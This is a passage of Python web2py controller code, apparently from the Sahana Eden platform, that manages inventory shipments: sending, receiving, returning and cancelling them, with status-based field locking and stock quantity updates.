# -----------------------------------------------------------------------------
def inv_item_quantity():
    """
        Return the stock quantity & pack quantity of an inventory item
        (id in request.args[0]) as JSON.
    """
    itable = s3db.inv_inv_item
    ptable = s3db.supply_item_pack
    query = (itable.id == request.args[0]) & \
            (itable.item_pack_id == ptable.id)
    row = db(query).select(itable.quantity,
                           ptable.quantity,
                           limitby=(0, 1)).first()
    response.headers["Content-Type"] = "application/json"
    return json.dumps(row)
# -----------------------------------------------------------------------------
def inv_item_packs():
    """
        Called by S3FilterFieldChange to provide the pack options for a
        particular Item
    """
    itable = s3db.inv_inv_item
    ptable = s3db.supply_item_pack
    # All packs defined for the supply item behind the given inventory item
    query = (itable.id == request.args[0]) & \
            (itable.item_id == ptable.item_id)
    rows = db(query).select(ptable.id,
                            ptable.name,
                            ptable.quantity)
    response.headers["Content-Type"] = "application/json"
    return rows.json()
# =============================================================================
def send():
    """
        RESTful CRUD controller for Outgoing Shipments (inv_send).

        The editability of the shipment and its track items is driven by
        the shipment status (in process / sent / received / cancelled /
        returning): once a shipment leaves the "in process" state the
        records are progressively locked down.
    """
    sendtable = s3db.inv_send
    tracktable = s3db.inv_track_item
    # Limit site_id to sites the user has permissions for
    error_msg = T("You do not have permission for any facility to send a shipment.")
    auth.permitted_facilities(table=sendtable, error_msg=error_msg)
    # Set Validator for checking against the number of items in the warehouse
    vars = request.vars
    if (vars.send_inv_item_id):
        if not vars.item_pack_id:
            # Default the pack to the stock item's own pack
            vars.item_pack_id = s3db.inv_inv_item[vars.send_inv_item_id].item_pack_id
        s3db.inv_track_item.quantity.requires = QUANTITY_INV_ITEM(db,
                                                                  vars.send_inv_item_id,
                                                                  vars.item_pack_id)
    # Shipment status constants (lookup once for readability below)
    SHIP_STATUS_IN_PROCESS = s3db.inv_ship_status["IN_PROCESS"]
    SHIP_STATUS_SENT = s3db.inv_ship_status["SENT"]
    SHIP_STATUS_RECEIVED = s3db.inv_ship_status["RECEIVED"]
    SHIP_STATUS_CANCEL = s3db.inv_ship_status["CANCEL"]
    SHIP_STATUS_RETURNING = s3db.inv_ship_status["RETURNING"]
    def set_send_attr(status):
        # Lock down inv_send fields once the shipment is no longer editable
        sendtable.send_ref.writable = False
        if status == SHIP_STATUS_IN_PROCESS:
            sendtable.send_ref.readable = False
        else:
            # Make all fields writable False
            for field in sendtable.fields:
                sendtable[field].writable = False
    # Track-item status constants
    TRACK_STATUS_UNKNOWN    = s3db.inv_tracking_status["UNKNOWN"]
    TRACK_STATUS_PREPARING  = s3db.inv_tracking_status["IN_PROCESS"]
    TRACK_STATUS_TRANSIT    = s3db.inv_tracking_status["SENT"]
    TRACK_STATUS_UNLOADING  = s3db.inv_tracking_status["UNLOADING"]
    TRACK_STATUS_ARRIVED    = s3db.inv_tracking_status["RECEIVED"]
    TRACK_STATUS_CANCELED   = s3db.inv_tracking_status["CANCEL"]
    TRACK_STATUS_RETURNING  = s3db.inv_tracking_status["RETURNING"]
    def set_track_attr(status):
        # Adjust inv_track_item field visibility/writability per status
        # By default Make all fields writable False
        for field in tracktable.fields:
            tracktable[field].writable = False
        # Hide some fields
        tracktable.send_id.readable = False
        tracktable.recv_id.readable = False
        tracktable.bin.readable = False
        tracktable.item_id.readable = False
        tracktable.recv_quantity.readable = False
        tracktable.return_quantity.readable = False
        tracktable.expiry_date.readable = False
        tracktable.owner_org_id.readable = False
        tracktable.supply_org_id.readable = False
        tracktable.adj_item_id.readable = False
        if status == TRACK_STATUS_PREPARING:
            # show some fields
            tracktable.send_inv_item_id.writable = True
            tracktable.item_pack_id.writable = True
            tracktable.quantity.writable = True
            tracktable.comments.writable = True
            # hide some fields
            tracktable.currency.readable = False
            tracktable.pack_value.readable = False
            tracktable.item_source_no.readable = False
            tracktable.inv_item_status.readable = False
        elif status == TRACK_STATUS_ARRIVED:
            # Shipment arrived display some extra fields at the destination
            tracktable.item_source_no.readable = True
            tracktable.recv_quantity.readable = True
            tracktable.return_quantity.readable = True
            tracktable.recv_bin.readable = True
            tracktable.currency.readable = True
            tracktable.pack_value.readable = True
        elif status == TRACK_STATUS_RETURNING:
            tracktable.return_quantity.readable = True
            tracktable.return_quantity.writable = True
            tracktable.currency.readable = True
            tracktable.pack_value.readable = True
    def prep(r):
        # Purpose: lock records & choose list_fields based on shipment status
        # Default to the Search tab in the location selector
        s3.gis.tab = "search"
        record = sendtable[r.id]
        if record and record.status != SHIP_STATUS_IN_PROCESS:
            # now that the shipment has been sent
            # lock the record so that it can't be meddled with
            s3db.configure("inv_send",
                           create=False,
                           listadd=False,
                           editable=False,
                           deletable=False,
                           )
        if r.component:
            if record.status == SHIP_STATUS_RECEIVED or \
               record.status == SHIP_STATUS_CANCEL:
                list_fields = ["id",
                               "status",
                               "item_id",
                               "item_pack_id",
                               "bin",
                               "quantity",
                               "currency",
                               "pack_value",
                               "recv_quantity",
                               "return_quantity",
                               "owner_org_id",
                               "supply_org_id",
                               "inv_item_status",
                               "comments",
                               ]
            elif record.status == SHIP_STATUS_RETURNING:
                list_fields = ["id",
                               "status",
                               "item_id",
                               "item_pack_id",
                               "quantity",
                               "currency",
                               "pack_value",
                               "return_quantity",
                               "bin",
                               "owner_org_id",
                               "supply_org_id",
                               "inv_item_status",
                               ]
            else:
                list_fields = ["id",
                               "status",
                               "item_id",
                               "item_pack_id",
                               "quantity",
                               "currency",
                               "pack_value",
                               "bin",
                               "owner_org_id",
                               "supply_org_id",
                               "inv_item_status",
                               ]
            s3db.configure("inv_track_item",
                           list_fields=list_fields,
                           )
            # Can only create or delete track items for a send record if the status is preparing
            if r.method == "create" or r.method == "delete":
                if record.status != SHIP_STATUS_IN_PROCESS:
                    return False
            if r.method == "delete":
                return s3.inv_track_item_deleting(r.component_id)
            if r.record.get("site_id"):
                # Restrict to items from this warehouse only
                tracktable.send_inv_item_id.requires = IS_ONE_OF(db,
                                                         "inv_inv_item.id",
                                                         s3db.inv_item_represent,
                                                         orderby="inv_inv_item.id",
                                                         sort=True,
                                                         filterby = "site_id",
                                                         filter_opts = [r.record.site_id]
                                                         )
            # Hide the values that will be copied from the inv_inv_item record
            if r.component_id:
                track_record = tracktable[r.component_id]
                set_track_attr(track_record.status)
                # if the track record is linked to a request item then
                # the stock item has already been selected so make it read only
                if track_record and track_record.get("req_item_id"):
                    tracktable.send_inv_item_id.writable = False
                    tracktable.item_pack_id.writable = False
                    stock_qnty = track_record.send_inv_item_id.quantity
                    tracktable.quantity.comment = T("%d in stock" % stock_qnty)
                    tracktable.quantity.requires = QUANTITY_INV_ITEM(db,
                                                                     track_record.send_inv_item_id,
                                                                     track_record.item_pack_id)
                # Hide the item id
                tracktable.item_id.readable = False
            else:
                set_track_attr(TRACK_STATUS_PREPARING)
        if r.interactive:
            # Pick CRUD titles / handle receive-confirmation per status
            if r.record.status == SHIP_STATUS_IN_PROCESS:
                s3.crud_strings.inv_send.title_update = \
                s3.crud_strings.inv_send.title_display = T("Process Shipment to Send")
            elif "site_id" in request.vars and r.record.status == SHIP_STATUS_SENT:
                s3.crud_strings.inv_send.title_update = \
                s3.crud_strings.inv_send.title_display = T("Review Incoming Shipment to Receive")
            else:
                if request.get_vars.received:
                    # Set the items to being received
                    sendtable[r.id] = dict(status = SHIP_STATUS_RECEIVED)
                    db(tracktable.send_id == r.id).update(status = TRACK_STATUS_ARRIVED)
                    response.message = T("Shipment received")
                # else set the inv_send attributes
                elif r.id:
                    record = sendtable[r.id]
                    set_send_attr(record.status)
                else:
                    set_send_attr(SHIP_STATUS_IN_PROCESS)
                    sendtable.send_ref.readable = False
        return True
    if len(request.args) > 1 and request.args[1] == "track_item":
        # Shouldn't fail but...
        # if user enters the send id then it could so wrap in a try...
        try:
            status = sendtable[request.args[0]].status
        except:
            status = None
        if status:
            editable = False
            if status == SHIP_STATUS_RETURNING:
                editable = True
            # remove CRUD generated buttons in the tabs
            s3db.configure("inv_track_item",
                           create=False,
                           listadd=False,
                           editable=editable,
                           deletable=False,
                           )
    s3.prep = prep
    output = s3_rest_controller(rheader=s3.inv_send_rheader)
    return output
# ==============================================================================
def send_commit():
    """
        Create a Shipment (inv_send) from a Commitment (req_commit):
        copies the commit/request parties onto a new inv_send record,
        creates one inv_track_item per committed item, then redirects
        to the new shipment's track_item tab.

        Expects the req_commit id as the first URL argument.
    """
    # Get the commit record
    try:
        commit_id = request.args[0]
    except:
        redirect(URL(c="req",
                     f="commit"))
    req_table = s3db.req_req
    rim_table = s3db.req_req_item
    com_table = s3db.req_commit
    cim_table = s3db.req_commit_item
    send_table = s3db.inv_send
    track_table = s3db.inv_track_item
    # Joined commit + request row: both sides are needed below
    query = (com_table.id == commit_id) & \
            (com_table.req_id == req_table.id) & \
            (com_table.deleted == False)
    record = db(query).select(limitby = (0, 1)).first()
    # Create an inv_send and link to the commit
    # status 0 = In Process
    send_id = send_table.insert(sender_id = record.req_commit.committer_id,
                                site_id = record.req_commit.site_id,
                                recipient_id = record.req_req.requester_id,
                                to_site_id = record.req_req.site_id,
                                status = 0)
    # Get all of the committed items
    query = (cim_table.commit_id == commit_id) & \
            (cim_table.req_item_id == rim_table.id) & \
            (cim_table.deleted == False)
    records = db(query).select()
    # Create inv_track_items for each commit item
    # status 1 = Preparing
    for row in records:
        track_item_id = track_table.insert(track_org_id = record.req_commit.organisation_id,
                                           send_id = send_id,
                                           status = 1,
                                           item_id = row.req_req_item.item_id,
                                           item_pack_id = row.req_req_item.item_pack_id,
                                           quantity = row.req_commit_item.quantity,
                                           currency = row.req_req_item.currency,
                                           req_item_id = row.req_req_item.id
                                           )
        # Assign a tracking number derived from the new record id.
        # Bugfix: was track_table(track_table.id == id).update(...), which
        # updates an in-memory Row only - db(...).update() persists the value
        # (consistent with every other update in this controller)
        db(track_table.id == track_item_id).update(tracking_no = "TN:%6d" % (10000 + track_item_id))
    # Redirect to inv_send for the send id just created
    redirect(URL(c = "inv",
                 f = "send",
                 args = [send_id, "track_item"]))
# -----------------------------------------------------------------------------
def send_process():
    """
        Send a Shipment

        Flags the inv_send record (and its track items) as SENT, updates
        the in-transit quantities of any linked request items, and creates
        the matching inv_recv record at the destination site.

        Expects the inv_send id as the first URL argument.
    """
    try:
        send_id = request.args[0]
    except:
        redirect(URL(c="inv",
                     f="send"))
    stable = s3db.inv_send
    tracktable = s3db.inv_track_item
    siptable = s3db.supply_item_pack
    rrtable = s3db.req_req
    ritable = s3db.req_req_item
    # Validation: collect all error conditions before redirecting
    if not auth.s3_has_permission("update",
                                  stable,
                                  record_id=send_id):
        session.error = T("You do not have permission to send this shipment.")
    send_record = stable[send_id]
    if send_record.status != eden.inv.inv_ship_status["IN_PROCESS"]:
        session.error = T("This shipment has already been sent.")
    # Get the track items that are part of this shipment
    query = (tracktable.send_id == send_id ) & \
            (tracktable.deleted == False)
    track_items = db(query).select()
    if not track_items:
        session.error = T("No items have been selected for shipping.")
    if session.error:
        redirect(URL(c = "inv",
                     f = "send",
                     args = [send_id]))
    # Update Send record & lock for editing
    stable[send_id] = dict(date = request.utcnow,
                           status = eden.inv.inv_ship_status["SENT"],
                           owned_by_user = None,
                           owned_by_group = ADMIN)
    # if this is linked to a request then update the quantity in transit
    req_ref = send_record.req_ref
    query = (rrtable.req_ref == req_ref)
    req_rec = db(query).select(rrtable.id, limitby = (0, 1)).first()
    if req_rec:
        req_id = req_rec.id
        for track_item in track_items:
            if track_item.req_item_id:
                req_i = ritable[track_item.req_item_id]
                # Pack sizes of the requested item vs the shipped item
                req_p_qnty = siptable[req_i.item_pack_id].quantity
                t_qnty = track_item.quantity
                t_pack_id = track_item.item_pack_id
                inv_p_qnty = siptable[t_pack_id].quantity
                # Convert the shipped quantity into the request's pack units
                transit_quantity = t_qnty * inv_p_qnty / req_p_qnty
                # Field + value is evaluated server-side as an SQL expression
                db(ritable.id == track_item.req_item_id).update(quantity_transit = ritable.quantity_transit + transit_quantity)
        s3db.req_update_status(req_id)
    # Create a Receive record
    rtable = s3db.inv_recv
    recv_id = rtable.insert(sender_id = send_record.sender_id,
                            send_ref = send_record.send_ref,
                            req_ref = send_record.req_ref,
                            from_site_id = send_record.site_id,
                            eta = send_record.delivery_date,
                            recipient_id = send_record.recipient_id,
                            site_id = send_record.to_site_id,
                            comments = send_record.comments,
                            status = eden.inv.inv_ship_status["SENT"],
                            type = 1, # 1:"Another Inventory"
                            )
    # Change the status for all track items in this shipment to In transit
    # and link to the receive record
    db(tracktable.send_id == send_id).update(status = 2,
                                             recv_id = recv_id)
    session.confirmation = T("Shipment Items sent from Warehouse")
    redirect(URL(c = "inv",
                 f = "send",
                 args = [send_id, "track_item"]))
# -----------------------------------------------------------------------------
def send_returns():
    """
        Mark a sent shipment (and its linked inv_recv / track items) as
        RETURNING, so the return quantities can then be recorded.

        (Despite the original note, this does not cancel the shipment -
        see send_cancel for that.)

        @todo need to roll back commitments
    """
    # NOTE(review): no try/except here - a missing URL argument raises;
    # confirm this is intended (other functions in this file redirect)
    send_id = request.args[0]
    stable = s3db.inv_send
    rtable = s3db.inv_recv
    tracktable = s3db.inv_track_item
    if not auth.s3_has_permission("update",
                                  stable,
                                  record_id=send_id):
        session.error = T("You do not have permission to return this sent shipment.")
    send_record = stable[send_id]
    if send_record.status == eden.inv.inv_ship_status["IN_PROCESS"]:
        session.error = T("This shipment has not been sent - it cannot be returned because it can still be edited.")
    if session.error:
        redirect(URL(c = "inv",
                     f = "send",
                     args = [send_id],
                     )
                 )
    # Okay no error so far, change the status to Returning
    stable[send_id] = dict(date = request.utcnow,
                           status = eden.inv.inv_ship_status["RETURNING"],
                           owned_by_user = None,
                           owned_by_group = ADMIN)
    # Any track item carries the linked inv_recv id; flag it too
    recv_row = db(tracktable.send_id == send_id).select(tracktable.recv_id,
                                                        limitby = (0, 1)).first()
    if recv_row:
        recv_id = recv_row.recv_id
        rtable[recv_id] = dict(date = request.utcnow,
                               status = eden.inv.inv_ship_status["RETURNING"],
                               owned_by_user = None,
                               owned_by_group = ADMIN)
    # Set all track items to status of returning
    db(tracktable.send_id == send_id).update(status = eden.inv.inv_tracking_status["RETURNING"])
    session.confirmation = T("Sent Shipment has returned, indicate how many items will be returned to Warehouse.")
    redirect(URL(c = "inv",
                 f = "send",
                 args = [send_id, "track_item"]))
# -----------------------------------------------------------------------------
def return_process():
    """
        Return some stock from a shipment back into the warehouse

        For each track item: recv_quantity = quantity - return_quantity,
        and the returned quantity is added back to the originating
        inv_inv_item. Finally send/recv/track records are flagged RECEIVED.
    """
    # NOTE(review): a missing URL argument raises here (no try/except) -
    # confirm this is intended
    send_id = request.args[0]
    invtable = s3db.inv_inv_item
    stable = s3db.inv_send
    rtable = s3db.inv_recv
    tracktable = s3db.inv_track_item
    if not auth.s3_has_permission("update",
                                  stable,
                                  record_id=send_id):
        session.error = T("You do not have permission to return this sent shipment.")
    send_record = stable[send_id]
    if send_record.status != eden.inv.inv_ship_status["RETURNING"]:
        session.error = T("This shipment has not been returned.")
    if session.error:
        redirect(URL(c = "inv",
                     f = "send",
                     args = [send_id],
                     )
                 )
    # Okay no error so far, let's move the goods back into the warehouse
    # and then change the status to received
    # Update Receive record & lock for editing
    # Move each item to the site
    track_rows = db(tracktable.send_id == send_id).select()
    for track_item in track_rows:
        send_inv_id = track_item.send_inv_item_id
        return_qnty = track_item.return_quantity
        if return_qnty == None:
            return_qnty = 0
        # update the receive quantity in the tracking record
        tracktable[track_item.id] = dict (recv_quantity = track_item.quantity - return_qnty)
        if return_qnty:
            # Field + value is evaluated server-side as an SQL expression
            db(invtable.id == send_inv_id).update(quantity = invtable.quantity + return_qnty)
    stable[send_id] = dict(date = request.utcnow,
                           status = eden.inv.inv_ship_status["RECEIVED"],
                           owned_by_user = None,
                           owned_by_group = ADMIN)
    # Flag the linked inv_recv record (if any) as received too
    recv_row = db(tracktable.send_id == send_id).select(tracktable.recv_id,
                                                        limitby = (0, 1)).first()
    if recv_row:
        recv_id = recv_row.recv_id
        rtable[recv_id] = dict(date = request.utcnow,
                               status = eden.inv.inv_ship_status["RECEIVED"],
                               owned_by_user = None,
                               owned_by_group = ADMIN)
    # Change the status for all track items in this shipment to Received
    db(tracktable.send_id == send_id).update(status = eden.inv.inv_tracking_status["RECEIVED"])
    redirect(URL(c = "inv",
                 f = "send",
                 args = [send_id]))
# -----------------------------------------------------------------------------
def send_cancel():
    """
        This will cancel a shipment that has been sent

        Flags the inv_send and linked inv_recv as CANCEL, then deletes
        the track items (via inv_track_item_deleting, which also rolls
        back in-transit quantities on linked requests).

        @todo need to roll back commitments
    """
    # NOTE(review): a missing URL argument raises here (no try/except) -
    # confirm this is intended
    send_id = request.args[0]
    stable = s3db.inv_send
    rtable = s3db.inv_recv
    tracktable = s3db.inv_track_item
    if not auth.s3_has_permission("delete",
                                  stable,
                                  record_id=send_id):
        session.error = T("You do not have permission to cancel this sent shipment.")
    send_record = stable[send_id]
    if send_record.status != eden.inv.inv_ship_status["SENT"]:
        session.error = T("This shipment has not been sent - it has NOT been canceled because can still be edited.")
    if session.error:
        redirect(URL(c = "inv",
                     f = "send",
                     args = [send_id],
                     )
                 )
    # Okay no error so far, let's delete that baby
    # Change the send and recv status to cancelled
    stable[send_id] = dict(date = request.utcnow,
                           status = eden.inv.inv_ship_status["CANCEL"],
                           owned_by_user = None,
                           owned_by_group = ADMIN)
    recv_row = db(tracktable.send_id == send_id).select(tracktable.recv_id,
                                                        limitby = (0, 1)).first()
    if recv_row:
        recv_id = recv_row.recv_id
        rtable[recv_id] = dict(date = request.utcnow,
                               status = eden.inv.inv_ship_status["CANCEL"],
                               owned_by_user = None,
                               owned_by_group = ADMIN)
    # Change the track items status to canceled and then delete them
    # If they are linked to a request then the in transit total will also be reduced
    # Records can only be deleted if the status is In Process (or preparing)
    # so change the status before we delete
    db(tracktable.send_id == send_id).update(status = eden.inv.inv_tracking_status["IN_PROCESS"])
    track_rows = db(tracktable.send_id == send_id).select(tracktable.id)
    for track_item in track_rows:
        # NOTE(review): helpers elsewhere in this file live on s3db/s3db.* -
        # confirm s3.inv_track_item_deleting is actually defined on s3
        s3.inv_track_item_deleting(track_item.id)
    # Now change the status to (cancelled)
    db(tracktable.send_id == send_id).update(status = eden.inv.inv_tracking_status["CANCEL"])
    session.confirmation = T("Sent Shipment canceled and items returned to Warehouse")
    redirect(URL(c = "inv",
                 f = "send",
                 args = [send_id]))
# =============================================================================
def recv():
    """
        RESTful CRUD controller for Received Shipments (inv_recv)

        Field readability/writability on inv_recv and its inv_track_item
        component is driven by the shipment/tracking status via the
        set_recv_attr/set_track_attr helpers below.
    """
    recvtable = s3db.inv_recv
    tracktable = s3db.inv_track_item
    atable = s3db.inv_adj_item
    # Limit site_id to sites the user has permissions for
    if settings.get_inv_shipment_name() == "order":
        error_msg = T("You do not have permission for any facility to add an order.")
    else:
        error_msg = T("You do not have permission for any facility to receive a shipment.")
    auth.permitted_facilities(table=recvtable, error_msg=error_msg)
    # The inv_recv record might be created when the shipment is send and so it
    # might not have the recipient identified. If it is null then set it to
    # the person who is logged in (the default)
    id = request.args(0)
    if id:
        try:
            if recvtable[id].recipient_id == None:
                db(recvtable.id == id).update(recipient_id = auth.s3_logged_in_person())
        except:
            pass
    status = s3db.inv_ship_status
    SHIP_STATUS_IN_PROCESS = status["IN_PROCESS"]
    SHIP_STATUS_SENT = status["SENT"]
    SHIP_STATUS_RECEIVED = status["RECEIVED"]
    SHIP_STATUS_CANCEL = status["CANCEL"]
    def set_recv_attr(status):
        # Configure the inv_recv fields according to the shipment status
        recvtable.sender_id.readable = False
        recvtable.sender_id.writable = False
        recvtable.grn_status.readable = False
        recvtable.grn_status.writable = False
        recvtable.cert_status.readable = False
        recvtable.cert_status.writable = False
        recvtable.eta.readable = False
        recvtable.req_ref.writable = True
        if status == SHIP_STATUS_IN_PROCESS:
            recvtable.send_ref.writable = True
            recvtable.recv_ref.readable = False
            recvtable.sender_id.readable = False
        else:
            # Make all fields writable False
            for field in recvtable.fields:
                recvtable[field].writable = False
        if status == SHIP_STATUS_SENT:
            recvtable.recipient_id.readable = True
            recvtable.recipient_id.writable = True
            recvtable.comments.writable = True
    status = s3db.inv_tracking_status
    TRACK_STATUS_UNKNOWN    = status["UNKNOWN"]
    TRACK_STATUS_PREPARING  = status["IN_PROCESS"]
    TRACK_STATUS_TRANSIT    = status["SENT"]
    TRACK_STATUS_UNLOADING  = status["UNLOADING"]
    TRACK_STATUS_ARRIVED    = status["RECEIVED"]
    TRACK_STATUS_CANCELED   = status["CANCEL"]
    def set_track_attr(status):
        # Configure the inv_track_item fields according to tracking status
        # By default Make all fields writable False
        for field in tracktable.fields:
            tracktable[field].writable = False
        # Hide some fields
        tracktable.send_id.readable = False
        tracktable.recv_id.readable = False
        tracktable.bin.readable = False
        tracktable.adj_item_id.readable = False
        tracktable.recv_quantity.readable = True
        if status == TRACK_STATUS_PREPARING:
            # show some fields
            tracktable.item_source_no.writable = True
            tracktable.item_id.writable = True
            tracktable.item_pack_id.writable = True
            tracktable.quantity.writable = True
            tracktable.currency.writable = True
            tracktable.pack_value.writable = True
            tracktable.expiry_date.writable = True
            tracktable.recv_bin.writable = True
            tracktable.owner_org_id.writable = True
            tracktable.supply_org_id.writable = True
            tracktable.inv_item_status.writable = True
            tracktable.comments.writable = True
            tracktable.recv_quantity.readable = False
            # hide some fields
            tracktable.send_inv_item_id.readable = False
            # change some labels - NO - use consistent labels
            #tracktable.quantity.label = T("Quantity Delivered")
            tracktable.recv_bin.label = T("Bin")
        elif status == TRACK_STATUS_TRANSIT:
            # Hide the values that will be copied from the inv_inv_item record
            tracktable.send_inv_item_id.readable = False
            tracktable.send_inv_item_id.writable = False
            tracktable.item_source_no.readable = True
            tracktable.item_source_no.writable = False
            # Display the values that can only be entered on create
            tracktable.recv_quantity.writable = True
            tracktable.recv_bin.readable = True
            tracktable.recv_bin.writable = True
            tracktable.comments.writable = True
            # This is a received purchase so change the label to reflect this - NO - use consistent labels
            #tracktable.quantity.label = T("Quantity Delivered")
        elif status == TRACK_STATUS_ARRIVED:
            # Shipment has arrived: everything read-only except the bin
            tracktable.item_source_no.readable = True
            tracktable.item_source_no.writable = False
            tracktable.item_id.writable = False
            tracktable.send_inv_item_id.writable = False
            tracktable.item_pack_id.writable = False
            tracktable.quantity.writable = False
            tracktable.currency.writable = False
            tracktable.pack_value.writable = False
            tracktable.expiry_date.writable = False
            tracktable.owner_org_id.writable = False
            tracktable.supply_org_id.writable = False
            tracktable.recv_bin.readable = True
            tracktable.recv_bin.writable = True
    def prep(r):
        # Lock processed shipments & configure component/record fields
        record = recvtable[r.id]
        if (record and
            (record.status != SHIP_STATUS_IN_PROCESS and
             record.status != SHIP_STATUS_SENT)):
            # now that the shipment has been sent
            # lock the record so that it can't be meddled with
            s3db.configure("inv_recv",
                           create=False,
                           listadd=False,
                           editable=False,
                           deletable=False,
                           )
        if r.component:
            # Set the track_item attributes
            # Can only create or delete track items for a recv record if the status is preparing
            if r.method == "create" or r.method == "delete":
                if record.status != SHIP_STATUS_IN_PROCESS:
                    return False
            if r.component_id:
                track_record = tracktable[r.component_id]
                set_track_attr(track_record.status)
            else:
                set_track_attr(TRACK_STATUS_PREPARING)
                tracktable.status.readable = False
            if r.record and r.record.status == SHIP_STATUS_IN_PROCESS:
                s3.crud_strings.inv_recv.title_update = \
                s3.crud_strings.inv_recv.title_display = T("Process Received Shipment")
        else:
            # Set the recv attributes
            if r.id:
                record = recvtable[r.id]
                set_recv_attr(record.status)
            else:
                set_recv_attr(SHIP_STATUS_IN_PROCESS)
                recvtable.recv_ref.readable = False
                if r.method and r.method != "read":
                    # Don't want to see in Create forms
                    recvtable.status.readable = False
        return True
    s3.prep = prep
    if len(request.args) > 1 and request.args[1] == "track_item":
        # On the track_item tab, the list fields and CRUD permissions
        # depend on the parent shipment's status
        status = recvtable[request.args[0]].status
        if status == SHIP_STATUS_SENT:
            list_fields = ["id",
                           "status",
                           "item_id",
                           "item_pack_id",
                           "quantity",
                           "currency",
                           "pack_value",
                           "recv_quantity",
                           "recv_bin",
                           "owner_org_id",
                           "supply_org_id",
                           ]
            s3db.configure("inv_track_item",
                           list_fields=list_fields,
                           )
        if status:
            # remove CRUD generated buttons in the tabs
            s3db.configure("inv_track_item",
                           create=False,
                           listadd=False,
                           editable=False,
                           deletable=False,
                           )
            # status 2 == In Transit: items may still be edited on receipt
            if recvtable[request.args[0]].status == 2:
                s3db.configure("inv_track_item",
                               editable=True,
                               )
    output = s3_rest_controller(rheader=s3db.inv_recv_rheader)
    return output
# -----------------------------------------------------------------------------
def req_items_for_inv(site_id, quantity_type):
    """
        used by recv_process & send_process
        returns a dict of unique req items (with min db.req_req.date_required | db.req_req.date)
        key = item_id
        @param site_id: The inventory to find the req_items from
        @param quantity_type: str ("commit", "transit" or "fulfil) The
            quantity type which will be used to determine if this item is still outstanding
        @return: Storage mapping item_id -> Storage copy of the earliest
            outstanding req_item row (empty if the req module is disabled)
    """
    if not settings.has_module("req"):
        return Storage()
    table = s3db.req_req
    itable = s3db.req_req_item
    # NOTE(review): (itable.item_pack_id == itable.item_pack_id) compares the
    # field with itself - in SQL its only effect is to exclude rows where
    # item_pack_id is NULL. Confirm whether a join to supply_item_pack was
    # intended here.
    query = (table.site_id == site_id) & \
            (table.id == itable.req_id) & \
            (itable.item_pack_id == itable.item_pack_id) & \
            (itable["quantity_%s" % quantity_type] < itable.quantity) & \
            (table.cancel == False) & \
            (table.deleted == False) & \
            (itable.deleted == False)
    req_items = db(query).select(itable.id,
                                 itable.req_id,
                                 itable.item_id,
                                 itable.quantity,
                                 itable["quantity_%s" % quantity_type],
                                 itable.item_pack_id,
                                 orderby = table.date_required | table.date,
                                 #groupby = itable.item_id
                                 )
    # Because groupby doesn't follow the orderby, this will remove any
    # duplicate req_item, using the first record according to the orderby
    # req_items = req_items.as_dict( key = "req_req_item.item_id") <- doensn't work
    # @todo: web2py Rows.as_dict function could be extended to enable this functionality instead
    req_item_ids = []
    unique_req_items = Storage()
    for req_item in req_items:
        if req_item.item_id not in req_item_ids:
            # This item is not already in the dict
            unique_req_items[req_item.item_id] = Storage( req_item.as_dict() )
            req_item_ids.append(req_item.item_id)
    return unique_req_items
# -----------------------------------------------------------------------------
def req_item_in_shipment( shipment_item,
                          shipment_type,
                          req_items,
                          ):
    """
        Checks if a shipment item is in a request and updates req_item
        and the shipment.

        @param shipment_item: joined row containing the inv_<type>_item record
        @param shipment_type: "recv" or "send" - selects which req quantity
            column is updated ("fulfil" or "transit" respectively)
        @param req_items: dict of outstanding req_items keyed by item_id,
            as returned by req_items_for_inv()
        @return: (req_id, req_item_id) when matched, else (None, None)
    """
    shipment_item_table = "inv_%s_item" % shipment_type
    try:
        item_id = shipment_item[shipment_item_table].item_id
    except:
        # Fall back to the stock item when the typed key is absent
        item_id = shipment_item.inv_inv_item.item_id
    # Check for req_items
    if item_id in req_items:
        shipment_to_req_type = dict(recv = "fulfil",
                                    send = "transit")
        quantity_req_type = "quantity_%s" % shipment_to_req_type[shipment_type]
        # This item has been requested from this inv
        req_item = req_items[item_id]
        req_item_id = req_item.id
        # Update the req quantity
        # convert the shipment items quantity into the req_tem.quantity_fulfil (according to pack)
        quantity = req_item[quantity_req_type] + \
                   (shipment_item[shipment_item_table].pack_quantity / \
                    req_item.pack_quantity) * \
                    shipment_item[shipment_item_table].quantity
        quantity = min(quantity, req_item.quantity) #Cap at req. quantity
        s3db.req_req_item[req_item_id] = {quantity_req_type: quantity}
        # Link the shipment_item to the req_item
        s3db[shipment_item_table][shipment_item[shipment_item_table].id] = \
            dict(req_item_id = req_item_id)
        # Flag req record to update status_fulfil
        return req_item.req_id, req_item.id
    else:
        return None, None
# -----------------------------------------------------------------------------
def recv_process():
    """
        Receive a Shipment

        Flags the inv_recv (and any linked inv_send) as RECEIVED, assigns
        a GRN reference, then sets every track item to Unloading so that
        inv_track_item_onaccept moves stock into the site, updates linked
        requests and creates adjustments where needed.
    """
    try:
        recv_id = request.args[0]
    except:
        redirect(URL(f="recv"))
    atable = s3db.inv_adj
    rtable = s3db.inv_recv
    stable = s3db.inv_send
    tracktable = s3db.inv_track_item
    siptable = s3db.supply_item_pack
    rrtable = s3db.req_req
    ritable = s3db.req_req_item
    if not auth.s3_has_permission("update",
                                  rtable,
                                  record_id=recv_id):
        session.error = T("You do not have permission to receive this shipment.")
    recv_record = rtable[recv_id]
    # NOTE(review): attribute-style eden.inv.SHIP_STATUS_* is used here while
    # the rest of this file uses eden.inv.inv_ship_status[...] - confirm both
    # resolve to the same values
    if recv_record.status == eden.inv.SHIP_STATUS_RECEIVED:
        session.error = T("This shipment has already been received.")
    if recv_record.status == eden.inv.SHIP_STATUS_CANCEL:
        session.error = T("This shipment has already been received & subsequently canceled.")
    if session.error:
        redirect(URL(c = "inv",
                     f = "recv",
                     args = [recv_id]))
    site_id = recv_record.site_id
    # Update Receive record & lock for editing
    code = s3db.inv_get_shipping_code(settings.get_inv_recv_shortname(),
                                      recv_record.site_id,
                                      s3db.inv_recv.recv_ref)
    rtable[recv_id] = dict(date = request.utcnow,
                           recv_ref = code,
                           status = eden.inv.inv_ship_status["RECEIVED"],
                           owned_by_user = None,
                           owned_by_group = ADMIN)
    send_row = db(tracktable.recv_id == recv_id).select(tracktable.send_id,
                                                        limitby=(0, 1)).first()
    if send_row:
        send_id = send_row.send_id
        stable[send_id] = dict(date = request.utcnow,
                               status = eden.inv.inv_ship_status["RECEIVED"],
                               owned_by_user = None,
                               owned_by_group = ADMIN)
    # Change the status for all track items in this shipment to Unloading
    # the onaccept will then move the values into the site update any request
    # record, create any adjustment if needed and change the status to Arrived
    db(tracktable.recv_id == recv_id).update(status = 3)
    # Move each item to the site
    track_rows = db(tracktable.recv_id == recv_id).select()
